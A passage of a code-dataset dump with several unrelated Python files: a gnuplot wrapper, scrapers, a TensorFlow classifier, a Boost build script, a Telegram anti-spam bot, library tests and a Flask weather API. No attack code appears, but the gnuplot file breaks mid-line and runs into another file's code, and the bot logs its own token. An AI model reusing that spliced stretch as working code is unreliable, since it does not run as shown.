\"\n f\"Rounds to {DEFAULT_PRECISION} digits by default.\"\n ),\n metavar=\"\",\n )\n metrics_diff_parser.set_defaults(func=CmdMetricsDiff)\n","sub_path":"dvc/command/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38092503","text":"#!/bin/python3\n################################################################################\n# Requires:\n#\n#\n\nimport os\n\n\n###########################\n# Gnuplot\n###########################\nclass gnuplot:\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.lastPlotID = None\n self.constructed = 1\n self.plotName = \"plot\"\n self.dir = None\n self.plotTitle = \"\"\n self.x1Label = None\n self.x2Label = None\n self.y1Label = None\n self.y2Label = None\n self.plots = 1 # Number of individual plots output\n self.dataSets = 0 # Number of data sets\n self.cellParameters = [[0 for y in range(100)] for x in range(1000)]\n self.dataPointCount = [0 for y in range(100)]\n self.dataPointMultiplier = [0 for y in range(100)]\n self.dataAxes = [0 for y in range(100)]\n self.dataName = [0 for y in range(100)]\n self.dataCircles = [0 for y in range(100)]\n self.plotType = [0 for y in range(100)]\n self.maxRows = 0\n for x in range(0,1000):\n for y in range(0,100):\n self.cellParameters[x][y] = None\n for y in range(0,100):\n self.dataPointCount[y] = 0\n for y in range(0,100):\n self.dataPointMultiplier[y] = 1.0\n for y in range(0,100):\n self.dataAxes[y] = \"x1y1\"\n for y in range(0,100):\n self.dataName[y] = \" \"\n for y in range(0,100):\n self.dataCircles[y] = None\n for y in range(0,100):\n self.plotType[y] = \"linespoints\"\n # output file header\n self.plot = \"#################################################################################\\n\"\n self.plot = self.plot + \"# Gnuplot\\n\"\n self.plot = self.plot + \"#\\n\"\n self.plot = self.plot + \"#################################################################################\\n\"\n # batch list\n self.plotBatchList = \"\"\n\n def outputPlot(self, fileName):\n self.plotName = fileName\n\n def title(self, titleIn):\n self.plotTitle = titleIn\n\n def setDir(self, inDir=None):\n self.dir = inDir\n\n def axisLabel(self, axis, label):\n if(axis==\"x1\"):\n self.x1Label = label\n if(axis==\"x2\"):\n self.x2Label = label\n if(axis==\"y1\"):\n self.y1Label = label\n if(axis==\"y2\"):\n self.y2Label = label\n\n def addCircle(self, circleX, circleY, axis=1):\n if(axis==1):\n line = \"set object circle at first \"\n if(axis==2):\n line = \"set object circle at second \"\n line = line + str(circleX) + \",\" + str(circleY)\n line = line + \" radius char 0.7\"\n self.dataCircles.append(line)\n\n def addPlot(self, dataX, dataY, axis=None, dataName=\"\", xMult=1.0, yMult=1.0, plot=None):\n if(axis is None):\n axis = \"x1y1\"\n if(plot is None):\n plot = 1\n # Set x and y col\n xCol = 2 * self.dataSets\n yCol = 2 * self.dataSets + 1\n # plot multiplier\n self.dataPointMultiplier[xCol] = xMult;\n self.dataPointMultiplier[yCol] = yMult;\n self.dataName[xCol] = dataName\n # Store x data points\n row = 0\n for dataRow in dataX:\n self.cellParameters[xCol][row] = dataRow\n row = row + 1\n self.dataPointCount[xCol] = row\n self.dataAxes[xCol] = axis\n if(row>self.maxRows):\n self.maxRows = row\n row = 0\n # Store y data points\n for dataRow in dataY:\n self.cellParameters[yCol][row] = dataRow\n row = row + 1\n self.dataPointCount[yCol] = row\n # Increment data set counter\n 
self.dataSets = self.dataSets + 1\n # Last added\n self.lastPlotID = self.dataSets - 1\n\n def getLastPlotID(self):\n return self.lastPlotID\n\n def setPlotType(self, plotID, plotType):\n self.plotType[plotID] = plotType\n\n def makePlot(self):\n ##\n ## Set file names\n ##\n if(self.dir is not None):\n # Make dir\n cmdIn = \"mkdir -p \"+self.dir\n os.system(cmdIn)\n\n self.dataFileName = self.dir+\"/\"+self.plotName+\".csv\"\n self.gplotFileName = self.dir+\"/\"+self.plotName+\".plot\"\n self.plotFileName = self.dir+\"/\"+self.plotName+\".eps\"\n self.plotBatchName = self.dir+\"/\"+self.plotName+\".sh\"\n\n self.dataFileName_R = self.plotName+\".csv\"\n self.gplotFileName_R = self.plotName+\".plot\"\n self.plotFileName_R = self.plotName+\".eps\"\n self.plotBatchName_R = self.plotName+\".sh\"\n self.plotFilePNG_R = self.plotName+\".png\"\n else:\n self.dataFileName = self.plotName+\".csv\"\n self.gplotFileName = self.plotName+\".plot\"\n self.plotFileName = self.plotName+\".eps\"\n self.plotBatchName = self.plotName+\".sh\"\n\n self.dataFileName_R = self.plotName+\".csv\"\n self.gplotFileName_R = self.plotName+\".plot\"\n self.plotFileName_R = self.plotName+\".eps\"\n self.plotBatchName_R = self.plotName+\".sh\"\n self.plotFilePNG_R = self.plotName+\".png\"\n\n ##\n ## Data File\n ##\n\n wFile = open(self.dataFileName, 'w')\n for row in range (0,self.maxRows):\n fileLine = \"\"\n i = 0\n for dataSet in range(0,self.dataSets):\n if(i>0):\n fileLine = fileLine + \",\"\n col = 2 * dataSet\n fileLine = fileLine + str(self.cellParameters[col][row])\n fileLine = fileLine + \",\"\n fileLine = fileLine + str(self.cellParameters[col+1][row])\n i = i + 1\n wFile.write(str(fileLine)+'\\n')\n wFile.close()\n ##\n ## Plot File\n ##\n\n ## Make plot file\n #self.plot = self.plot + \"set terminal postscript eps monochrome enhanced blacktext size 6.6,3.6\\n\"\n self.plot = self.plot + \"set terminal postscript eps enhanced color size 6.6,3.6\\n\"\n self.plot = self.plot + \"set output \\\"\"+self.plotFileName_R+\"\\\"\\n\"\n self.plot = self.plot + \"#\\n\"\n self.plot = self.plot + \"# Set multiple plot layout\\n\"\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"set multiplot layout 1,1 rowsfirst\\n\"\n self.plot = self.plot + \"#\\n\"\n self.plot = self.plot + \"# Data file\\n\"\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"set datafile separator \\\",\\\"\\n\"\n ## One for each plot, if multiple plots\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"# Plot 1\\n\"\n self.plot = self.plot + \"#============================================\\n\"\n self.plot = self.plot + \"# Title \\n\"\n self.plot = self.plot + \"set title \\\"\"+self.plotTitle+\"\\\"\\n\"\n self.plot = self.plot + \"# Grid settings \\n\"\n self.plot = self.plot + \"#set grid xtics lc rgb \\\"#CCCCCC\\\" lw 0.2 lt 1 \\n\"\n self.plot = self.plot + \"#set grid ytics lc rgb \\\"#CCCCCC\\\" lw 0.2 lt 1 \\n\"\n self.plot = self.plot + \"# Key settings \\n\"\n self.plot = self.plot + \"set key box opaque \\n\"\n self.plot = self.plot + \"set border back \\n\"\n self.plot = self.plot + \"# Axis \\n\"\n if(self.x1Label is not None):\n self.plot = self.plot + \"set xlabel \\\"\"+self.x1Label+\"\\\"\\n\"\n if(self.x2Label is not None):\n self.plot = self.plot + \"set x2label \\\"\"+self.x2Label+\"\\\"\\n\"\n if(self.y1Label is not None):\n self.plot = self.plot + \"set 
ylabel \\\"\"+self.y1Label+\"\\\"\\n\"\n if(self.y2Label is not None):\n self.plot = self.plot + \"set y2label \\\"\"+self.y2Label+\"\\\"\\n\"\n self.plot = self.plot + \"#set xtics 10\\n\"\n self.plot = self.plot + \"set ytics nomirror tc lt 1\\n\"\n self.plot = self.plot + \"set y2tics nomirror tc lt 1\\n\"\n self.plot = self.plot + \"# Circles \\n\"\n for circles in self.dataCircles:\n if circles is not None:\n self.plot = self.plot + circles+\"\\n\"\n self.plot = self.plot + \"# Plot \\n\"\n self.plot = self.plot + \"plot \\\\\\n\"\n y = 0\n for dataSet in range(0,self.dataSets):\n col = 2 * dataSet\n self.plot = self.plot + \"'\"+self.dataFileName_R+\"' \"\n self.plot = self.plot + \"using \"\n self.plot = self.plot + \"(\"+str(self.dataPointMultiplier[col])+\" * $\"+str(col+1)+\")\"\n self.plot = self.plot + \":\"\n self.plot = self.plot + \"(\"+str(self.dataPointMultiplier[col+1])+\" * $\"+str(col+2)+\") \"\n self.plot = self.plot + \" title '\"+self.dataName[col]+\"' \"\n self.plot = self.plot + \" with \"+str(self.plotType[y])+\" axes \"\n self.plot = self.plot + self.dataAxes[col]\n y = y + 1\n if(dataSet'\n pic = re.compile(pic)\n pic_url = re.findall(pic,nextHtml.text)\n #print(pic_url)\n picture = load_pic(pic_url)\n\n ##保存图片\n with open(\"{}\\{}.jpg\".format(path,url_name),\"wb\") as f:\n f.write(picture)\n print(\"%s.%s图片保存成功\"%(num,url_name))\n num+=1\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n Url_getpic()","sub_path":"demo2/Spider.py","file_name":"Spider.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"487215538","text":"import sys\nimport heapq\nfrom bisect import *\nfrom collections import *\n\ndef solve(n, riders):\n riders = [ r-1 for r in riders ]\n ans = 0\n for index, r in enumerate(riders):\n if r - index > 2:\n return 'Too chaotic'\n\n # count how many bribed rider r\n for j in range(max(r-2, 0), index):\n if riders[j] > r:\n ans += 1\n\n return ans\n\n\ninp = lambda: sys.stdin.readline().rstrip()\nif __name__ == '__main__':\n t = int(inp())\n for tc in range(t):\n n = int(inp())\n riders = list(map(int, inp().split()))\n res = solve(n, riders)\n print(res)\n","sub_path":"hackerrank/new-year-chaos.py","file_name":"new-year-chaos.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"532614693","text":"import tensorflow as tf\nimport numpy as np\n\n\n\"\"\"\nThere is no way to increase model capacity \nI think network makes all the outputs (probability) 0 and\nmake the correctness 50 percent.\n\"\"\"\n\n\n# make weight variable\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\n# make bias variable\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\n# Step 1: data loading and preprocessing\nfamhist = np.genfromtxt('../../data/heart.csv', delimiter=',',\n skip_header=1, dtype=str, usecols=[4])\nfamhist = (famhist == 'Present').astype(np.float32)\n\nheart_data = np.genfromtxt('../../data/heart.csv', delimiter=',',\n skip_header=1, dtype=np.float32,\n usecols=[i for i in range(10) if i != 4])\n# labeling\nheart_label = heart_data[:, -1].reshape([462, 1])\nheart_label = np.concatenate((heart_label, 1 - heart_label), axis=1)\n\n# normalization\nheart_data = heart_data[:, :-1]\nnormalized_heart_data = np.divide(heart_data, np.linalg.norm(heart_data, 
axis=0))\n\nheart_data = np.concatenate((normalized_heart_data, famhist.reshape([462, 1])),\n axis=1)\n\ntrain_data = heart_data[:400]\ntrain_label = heart_label[:400]\ntest_data = heart_data[400:]\ntest_label = heart_label[400:]\n\n# Step 2: create placeholders for input X (number of fire) and label Y (number of theft)\nX = tf.placeholder(tf.float32, name=\"X\")\nY = tf.placeholder(tf.float32, name=\"Y\")\n\n# Step 3: create weight and bias\nw_1 = weight_variable([9, 100])\nb_1 = bias_variable([100])\n\nkeep_prob = tf.placeholder(tf.float32)\n\nw_2 = weight_variable([100, 100])\nb_2 = bias_variable([100])\n\nw_3 = weight_variable([100, 2])\nb_3 = bias_variable([2])\n\n# Step 4: construct model to predict Y\nhidden_state = tf.nn.relu(tf.matmul(X, w_1) + b_1)\nhidden_state_1 = tf.nn.dropout(hidden_state, keep_prob)\nhidden_state2 = tf.nn.relu(tf.matmul(hidden_state_1, w_2) + b_2)\nhidden_state2_1 = tf.nn.dropout(hidden_state2, keep_prob)\nlogits = tf.matmul(hidden_state2_1, w_3) + b_3\n\nentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y, name='loss')\nloss = tf.reduce_mean(entropy) # compute the mean over examples in the batch\n\n# Step 6: using gradient descent with learning rate of 0.01 to minimize loss\noptimizer = tf.train.AdamOptimizer(learning_rate=0.01).minimize(loss)\ninit = tf.global_variables_initializer()\n\n\nwith tf.Session() as sess:\n # to visualize using TensorBoard\n writer = tf.summary.FileWriter('./logistic_reg', sess.graph)\n\n sess.run(init)\n for i in range(1000):\n total_loss = 0\n _, l = sess.run([optimizer, loss],\n feed_dict={X: train_data, Y: train_label, keep_prob: 0.5})\n total_loss += l\n print('Average loss epoch {0}: {1}'.format(i, total_loss))\n print('Optimization Finished')\n\n # test the model\n\n preds = tf.nn.softmax(logits)\n correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_sum(tf.cast(correct_preds, tf.float32))\n total_correct_preds = 0\n accuracy_batch = sess.run(accuracy,\n feed_dict={X: test_data, Y: test_label, keep_prob: 1.0})\n total_correct_preds += accuracy_batch\n print('Accuracy {0}'.format(total_correct_preds))\n\n writer.close()\n","sub_path":"assignments/exercises/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"65883738","text":"import logging\nimport subprocess\nfrom multiprocessing import cpu_count\nfrom os.path import abspath, exists\n\nfrom setup_utils import get_include_dir, get_vcvarsall, is_win, is_darwin\n\n\ndef call(cmd, **kwargs):\n cwd = f\"{kwargs['cwd']}> \" if 'cwd' in kwargs else \"\"\n msg = f\"spawning subprocess: {cwd}{cmd}\"\n logging.info(msg)\n subprocess.run(cmd, shell=True, check=True, **kwargs)\n\n\ndef main():\n build_prefix = abspath(\"build_boost\")\n pkg_prefix = abspath(\"pyopcode\")\n toolset = \"gcc\"\n sh_ext = \"sh\"\n sh_prefix = \"./\"\n if is_win:\n call(f\"\\\"{get_vcvarsall()}\\\" amd64\")\n toolset = \"msvc\"\n sh_ext = \"bat\"\n sh_prefix = \"\"\n if is_darwin:\n toolset = \"clang\"\n if not exists(build_prefix):\n call(f\"{sh_prefix}bootstrap.{sh_ext}\", cwd=\"boost_1_67_0\")\n call(f\"{sh_prefix}b2\"\n f\" toolset={toolset}\"\n \" address-model=64\"\n \" link=shared\"\n \" variant=release\"\n \" threading=multi\"\n \" runtime-link=shared\"\n f\" include={get_include_dir()}\"\n \" --with-python\"\n f\" -j{cpu_count()}\"\n \" install\"\n f\" --prefix=\\\"{build_prefix}\\\"\"\n f\" 
--libdir=\\\"{pkg_prefix}\\\"\",\n cwd=\"boost_1_67_0\")\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n main()\n","sub_path":"build_boost.py","file_name":"build_boost.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152866792","text":"from telegram import (Bot, Update, InlineKeyboardMarkup, InlineKeyboardButton)\nfrom telegram.ext import (CallbackContext, ConversationHandler)\nimport os, logging\nfrom modules import pytesseractModule, twitterScreenshotRecognizer\nfrom token_extractor import token\nprint(token)\nlogging.info(f\"{token}\")\nbot = Bot(token)\n\n# # Define a few command handlers. These usually take the two arguments update and\n# # context. Error handlers also receive the raised TelegramError object in error.\n\ndef start(update, context):\n user_info = update.message.from_user\n chat_id = update.message.chat.id\n logging.info(\"Test log! user data read successfully.\")\n update.message.reply_text(\n\"\"\"Привет, {}! 👩🏻‍💻 \"\"\".format(user_info.first_name))\n\n context.chat_data.clear()\n user_data = context.user_data\n user_data.clear()\n return -1\n\ndef help_command(update: Update, context: CallbackContext) -> None:\n \"\"\"Send a message when the command /help is issued.\"\"\"\n update.message.reply_text('Help!')\n\ndef test(update, context):\n text = pytesseractModule.read_image()\n update.message.reply_text(f'{text}')\n\ndef image_handler(update: Update, context: CallbackContext):\n file_id = update.message.photo[-1].file_id\n file_ = bot.getFile(file_id)\n path = os.getcwd() + \"/tmp/\" + file_id + \".jpg\"\n #create path if nessesary\n if not os.path.exists(os.getcwd() + \"/tmp/\"):\n os.makedirs(os.getcwd() + \"/tmp/\")\n # now download files\n file_.download(path)\n blacklist = [\"bitcoin\", \"elon\", \"musk\", \"crypto\", \"cryptocurrency\", \"btc\", \"eth\"]\n response = twitterScreenshotRecognizer.inspect(path)\n \n if response == \"tweets\":\n text = pytesseractModule.read_image(path)\n if any([(word in text.lower()) for word in blacklist]):\n update.message.reply_text(f'Спамер обноружен! Это похоже на скриншот твиттера c мошенниками. Хватит спамить! 🙄')\n try:\n bot.delete_message(chat_id=update.message.chat_id,\n message_id=update.message.message_id)\n except:\n update.message.reply_text(\"Can't delete message cause probably i dont have admin rights.\")\n else:\n update.message.reply_text(f'Это похоже на скриншот твиттера. 
U\\'re on thin freaking ice!')\n else: \n update.message.reply_text(\"Nice pic u got there, be sure not to post twitter screenshoots with Elon Musk on my watch 👀\")","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"390928553","text":"#!/usr/bin/python\n# -*- encoding: utf-8 -*-\nimport os\n\nimport psutil\nimport pyexcel as pe\nfrom nose import SkipTest\nfrom nose.tools import eq_, raises\n\nfrom pyexcel_odsr import get_data\n\nIN_TRAVIS = \"TRAVIS\" in os.environ\n\n\ndef test_bug_fix_for_issue_1():\n data = get_data(get_fixtures(\"repeated.ods\"), library=\"pyexcel-odsr\")\n eq_(data[\"Sheet1\"], [[\"repeated\", \"repeated\", \"repeated\", \"repeated\"]])\n\n\ndef test_issue_14():\n # pyexcel issue 61\n test_file = \"issue_61.ods\"\n data = get_data(\n get_fixtures(test_file), skip_empty_rows=True, library=\"pyexcel-odsr\"\n )\n eq_(data[\"S-LMC\"], [[u\"aaa\"], [0]])\n\n\ndef test_issue_1():\n test_file = \"12_day_as_time.ods\"\n data = get_data(\n get_fixtures(test_file), skip_empty_rows=True, library=\"pyexcel-odsr\"\n )\n eq_(data[\"Sheet1\"][0][0].days, 12)\n\n\ndef test_issue_2():\n test_file = \"multinode-in-a-p.ods\"\n data = get_data(\n get_fixtures(test_file), skip_empty_rows=True, library=\"pyexcel-odsr\"\n )\n eq_(data[\"product.template\"][1][1], \"PRODUCT NAME PMP\")\n\n\ndef test_issue_83_ods_file_handle():\n # this proves that odfpy\n # does not leave a file handle open at all\n proc = psutil.Process()\n test_file = get_fixtures(\"multinode-in-a-p.ods\")\n open_files_l1 = proc.open_files()\n\n # start with a csv file\n data = pe.iget_array(file_name=test_file, library=\"pyexcel-odsr\")\n open_files_l2 = proc.open_files()\n delta = len(open_files_l2) - len(open_files_l1)\n # cannot catch open file handle\n assert delta == 0\n\n # now the file handle get opened when we run through\n # the generator\n list(data)\n open_files_l3 = proc.open_files()\n delta = len(open_files_l3) - len(open_files_l1)\n # cannot catch open file handle\n assert delta == 0\n\n # free the fish\n pe.free_resources()\n open_files_l4 = proc.open_files()\n # this confirms that no more open file handle\n eq_(open_files_l1, open_files_l4)\n\n\ndef test_issue_23():\n if not IN_TRAVIS:\n raise SkipTest()\n pe.get_book(\n url=\"https://github.com/pyexcel/pyexcel-ods/raw/master/tests/fixtures/white_space.ods\",\n library=\"pyexcel-odsr\",\n )\n # flake8: noqa\n\n\ndef get_fixtures(filename):\n return os.path.join(\"tests\", \"fixtures\", filename)\n","sub_path":"tests/test_bug_fixes.py","file_name":"test_bug_fixes.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200210294","text":"# Taken from SQLAlchemy with lots of stuff stripped out.\n\n# sqlalchemy/processors.py\n# Copyright (C) 2010-2013 the SQLAlchemy authors and contributors \n# Copyright (C) 2010 Gaetan de Menten gdementen@gmail.com\n#\n# This module is part of SQLAlchemy and is released under\n# the MIT License: http://www.opensource.org/licenses/mit-license.php\n\n\"\"\"defines generic type conversion functions, as used in bind and result\nprocessors.\n\nThey all share one common characteristic: None is passed through unchanged.\n\n\"\"\"\n\nimport datetime\nimport re\n\n\ndef str_to_datetime_processor_factory(regexp, type_):\n rmatch = regexp.match\n # Even on python2.6 datetime.strptime is both slower 
than this code\n # and it does not support microseconds.\n has_named_groups = bool(regexp.groupindex)\n\n def process(value):\n if value is None:\n return None\n else:\n try:\n m = rmatch(value)\n except TypeError:\n raise ValueError(\"Couldn't parse %s string '%r' \"\n \"- value is not a string.\" %\n (type_.__name__, value))\n if m is None:\n raise ValueError(\"Couldn't parse %s string: \"\n \"'%s'\" % (type_.__name__, value))\n if has_named_groups:\n groups = m.groupdict(0)\n return type_(**dict(zip(groups.iterkeys(),\n map(int, groups.itervalues()))))\n else:\n return type_(*map(int, m.groups(0)))\n return process\n\n\nDATETIME_RE = re.compile(\"(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)(?:\\.(\\d+))?\")\n\nstr_to_datetime = str_to_datetime_processor_factory(DATETIME_RE,\n datetime.datetime)\n","sub_path":"pyhive/sqlalchemy_processors.py","file_name":"sqlalchemy_processors.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"337059293","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import BeibeispiderItem\n\n\nclass BeibeiSpider(scrapy.Spider):\n\tname = 'beibei'\n\tallowed_domains = ['beibei.com']\n\tstart_urls = ['https://www.beibei.com/']\n\n\tdef parse(self, response):\n\t\t\"\"\"\n\t\t获得所有种类\n\t\t:param response:\n\t\t:return:\n\t\t\"\"\"\n\t\tall_link_list = response.xpath(\"//div[@class='sub-nav-cont']/div/div/ul/li/a/@href\").getall()\n\t\tall_link_list = all_link_list[1:10]\n\t\tfor link in all_link_list:\n\t\t\tnew_link = 'https:' + link\n\t\t\tyield scrapy.Request(url = new_link, callback = self.parse_all_page, meta = {'cate_link': new_link})\n\n\tdef parse_all_page(self, response):\n\t\t\"\"\"\n\t\t获得所有页\n\t\t:param response:\n\t\t:return:\n\t\t\"\"\"\n\t\tcate_link = response.meta['cate_link']\n\t\tmax_page_num = response.xpath(\"//div[@class='pagination']/a[last()-1]/text()\").get()\n\t\tif max_page_num:\n\t\t\tfor i in range(1, int(max_page_num) + 1):\n\t\t\t\tyield scrapy.Request(url = str(cate_link).replace('-1', '-' + str(i)), callback = self.parse_info)\n\t\telse:\n\t\t\tyield scrapy.Request(url = cate_link, callback = self.parse_info)\n\n\tdef parse_info(self, response):\n\t\t\"\"\"\n\t\t获取 每个类别,每一页,每个商品的标题,现价,原价,折扣,详细链接,图片链接,\n\t\t:param response:\n\t\t:return:\n\t\t\"\"\"\n\t\tall_info_list = response.xpath(\"//div[@class='m-item-detail']\")\n\t\tfor info in all_info_list:\n\t\t\titem = BeibeispiderItem()\n\n\t\t\titem['goods_title'] = info.xpath(\"./a/p/text()\").get()\n\t\t\titem['now_price'] = info.xpath(\"./a/div/p[1]/span[2]/text()\").get()\n\t\t\titem['origin_price'] = info.xpath(\"./a/div/p[2]/text()\").get()\n\t\t\titem['discount'] = info.xpath(\"./a/div/p[3]/text()\").get()\n\t\t\titem['next_link'] = info.xpath(\"./a/@href\").get()\n\t\t\titem['img_link'] = info.xpath(\"./a/img/@src\").get()\n\n\t\t\tyield item\n","sub_path":"BeibeiSpider/BeibeiSpider/spiders/beibei.py","file_name":"beibei.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"48300833","text":"from sys import stdin, setrecursionlimit\nfrom collections import deque\nfrom bisect import bisect_left\n\n\ndef main():\n input = stdin.buffer.readline\n n = int(input())\n a = [int(input()) for _ in range(n)]\n ans = deque()\n for ai in a:\n idx = bisect_left(ans, ai)\n if idx == 0:\n ans.appendleft(ai)\n else:\n ans[idx - 1] = ai\n\n print(len(ans))\n\n\nif __name__ == \"__main__\":\n 
setrecursionlimit(10000)\n main()\n","sub_path":"Python_codes/p02973/s460915841.py","file_name":"s460915841.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"187847908","text":"f = open(\"g1/ex20/file.txt\",\"r\")\n\nnline = 0\nnWord = 0\nnChar = 0\n\nfor line in f:\n if line ==\"\":\n break\n \n nline += 1\n\n s = line.split()\n\n for word in s:\n nWord += 1\n nChar += len(word)\n\nprint(\"O ficheiro tem %d linhas, %d palavras e %d caracteres\"%(nline,nWord,nChar))","sub_path":"g1/ex20/prog.py","file_name":"prog.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"284323605","text":"# coding=utf-8\nimport os\n\nfrom duckietown_challenges import read_yaml_file\n\n\nclass ChallengeInfoLocal:\n def __init__(self, challenge_name):\n self.challenge_name = challenge_name\n\n\ndef read_challenge_info(dirname):\n bn = 'challenge.yaml'\n fn = os.path.join(dirname, bn)\n\n data = read_yaml_file(fn)\n try:\n challenge_name = data['challenge']\n\n return ChallengeInfoLocal(challenge_name)\n except BaseException as e:\n msg = 'Could not read file %r: %s' % (fn, e)\n raise Exception(msg)\n","sub_path":"src/duckietown_challenges_runner/local_config.py","file_name":"local_config.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"308937078","text":"'''\nAuthor: Puffrora\nDate: 2021-03-01 20:24:03\nLastModifiedBy: Puffrora\nLastEditTime: 2021-03-01 20:35:07\n'''\n\n\nfrom typing import List\n\n\nclass Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n\n visited = set()\n row, col = len(matrix), len(matrix[0])\n\n def get_neighbor(i, j):\n for dx, dy in [(0, 1), (0, -1), (-1, 0), (1, 0)]:\n if 0 <= i+dx < row and 0 <= j+dy < col:\n yield i+dx, j+dy\n \n queue = []\n for i in range(row):\n for j in range(col):\n if matrix[i][j] == 0:\n visited.add((i, j))\n queue.append((i, j))\n \n cur_depth = 0\n while queue:\n cur_depth += 1\n for _ in range(len(queue)):\n cur_i, cur_j = queue.pop(0)\n for ni, nj in get_neighbor(cur_i, cur_j):\n if (ni, nj) not in visited:\n matrix[ni][nj] = cur_depth\n visited.add((ni, nj))\n queue.append((ni, nj))\n \n return matrix\n\n\n","sub_path":"Leetcode/leetcode542 01 矩阵.py","file_name":"leetcode542 01 矩阵.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"204603606","text":"from socket import *\n\nHOST = '127.0.0.1' \nPORT = 21575 #可用端口\nBUFSIZ = 1024\nADDR = (HOST,PORT)\n\ntcpCliSock = socket(AF_INET,SOCK_STREAM)\ntcpCliSock.connect(ADDR)\n\nwhile True:\n\tdata = input()\n\tif not data:\n\t\tbreak\n\ttcpCliSock.send(data.encode(encoding = \"utf-8\")) #法送数据为bytes型str->bytes \n\tdata = tcpCliSock.recv(BUFSIZ)\n\tif not data:\n\t\tbreak\n\tprint (data.decode()) #bytes->str\n\ntcpCliSock.close()","sub_path":"tsTclnt.py","file_name":"tsTclnt.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555443397","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom json import dumps\nfrom flask_jsonpify import jsonify\nfrom flask import render_template\nfrom flask import abort\nimport json\nimport pandas as 
pd\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse\n\ndb_connect = create_engine('sqlite:///daily.db')\napp = Flask(__name__)\napi = Api(app)\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\n@app.route('/historical/', methods=['GET', 'POST'])\ndef historical():\n if request.method == 'GET':\n dates_list = []\n conn = db_connect.connect()\n query = conn.execute(\"select DATE from daily\")\n my_hist = [i[0] for i in query.cursor.fetchall()]\n for item in my_hist:\n obj = {\"DATE\":item}\n dates_list.append(obj)\n return jsonify(dates_list)\n else:\n obj = {}\n conn = db_connect.connect()\n query = conn.execute(\"insert into daily(DATE,TMAX,TMIN) values (?,?,?)\",(request.json[\"DATE\"],request.json[\"TMAX\"],request.json[\"TMIN\"]))\n obj = {\n \"DATE\" : request.json[\"DATE\"]\n }\n return jsonify(obj), 201\n\n\n@app.route('/historical/', methods=['GET','DELETE'])\ndef get_weather(DATE):\n if request.method == 'DELETE':\n conn = db_connect.connect()\n query = conn.execute(\"select DATE from daily where DATE=%d\" % int(DATE))\n result = [dict(zip(tuple(query.keys()), i)) for i in query.cursor]\n if(len(result)>0):\n query = conn.execute(\"delete from daily where DATE=%d\" % int(DATE))\n return \" \", 204\n else:\n abort(404)\n else:\n obj = {}\n conn = db_connect.connect()\n query = conn.execute(\"select DATE,TMAX,TMIN from daily where DATE =%d\" % int(DATE))\n result = [dict(zip(tuple(query.keys()), i)) for i in query.cursor]\n if(len(result)>0):\n for item in result:\n obj = {\n \"DATE\": item['date'],\n \"TMAX\": item['tmax'],\n \"TMIN\": item['tmin']\n }\n return jsonify(obj)\n else:\n abort(404)\n\n\n@app.route('/forecast/')\ndef forecast_weather(DATE):\n lst_dates = []\n lst_obj = []\n current_date = pd.to_datetime(DATE,format='%Y%m%d')\n stop_date = current_date+timedelta(days=7)\n while current_date 0):\n for item in result:\n obj = {\n \"DATE\": curr_date,\n \"TMAX\": item['tmax'],\n \"TMIN\": item['tmin']\n }\n lst_obj.append(obj)\n else:\n curr_1 = \"2013\"+curr_date[4:]\n query = conn.execute(\"select DATE,TMAX,TMIN from daily where DATE =%d\" % int(curr_1))\n result = [dict(zip(tuple(query.keys()), i)) for i in query.cursor]\n for item in result:\n obj = {\n \"DATE\": curr_date,\n \"TMAX\": item['tmax'],\n \"TMIN\": item['tmin']\n }\n 